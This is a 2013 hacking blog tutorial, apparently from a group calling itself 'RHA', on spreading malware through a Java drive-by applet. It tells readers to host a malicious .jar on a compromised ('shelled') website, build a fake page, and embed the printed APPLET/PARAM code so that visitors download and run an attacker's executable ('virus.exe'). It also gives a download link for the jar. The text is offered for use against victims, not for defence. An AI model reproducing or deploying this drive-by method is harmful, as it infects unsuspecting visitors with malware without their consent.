Saturday 23 March 2013

How Attackers Spread Malware With Java Drive by?


Posted: 19 Mar 2013 12:27 PM PDT
http://www.foto.pk/images/cpature.jpg

Hello RHA fans,

We are back with a new tutorial. Well making a malicious virus is one thing but how to spread it? Or how hackers hunt for victims? Well you will definitely be disappointed when you’ll know that this trick fails sometimes! Victims are now mostly aware of the old social engineering stuff.  But cheers up my friend there's no end, i will show you a very effective methods that attackers use to spread malicious viruses/worms.



Well In this tutorial RHA will show you to spread virus with JAVA DRIVE BY!
What is java drive by:
A Java Drive-By is a Java Applet that is coded in Java, when placed on a website. Once you click "Run" on the pop-up, it will download a program off the internet. This program can be used to spread a virus and malware effectively and has been spotted in the wild. We can execute .exe files in victims’ computer without their permission with the help of java drive by. You can see the image of error below this:
http://foto.pk/images/capturlcl.png

Okay so whats the scenario behind this? well this is a java script in the source which pop ups the error, So lets learn how to do the job. 
Tools we need in this game are:
i) a .jar file which is the main player of this game. Download it from here http://www.mediafire.com/?mmafl2carb1s159 
ii)
 A shelled web where you will upload files for JAVA DRIVE BY! Plus you should know basic HTML to make a attractive web page. 
iii)
 A java script which is the backbone of your game. 

Now lets get started, Upload you
 .jar file on the shelled web, than create a fake webpage its up to you how you much you make fake webpage attractive, but you have to add the java code due to which the pop up error will appear 
Java Code: 
<APPLET CODE = "Client.class" ARCHIVE = "Client.jar" WIDTH = "0" HEIGHT = "0">
    <PARAM NAME = "AMLMAFOIEA" VALUE = "http://www.yoursite.com/virus.exe">
 


So add the above code in your face webpage, just make some changes replace VALUE = "http://www.yoursite.com/virus.exe" with your virus like the image below:
http://www.foto.pk/images/capturfzf.png
 So this is it! Simplest and most effective method used by attackers to spread your malicious software.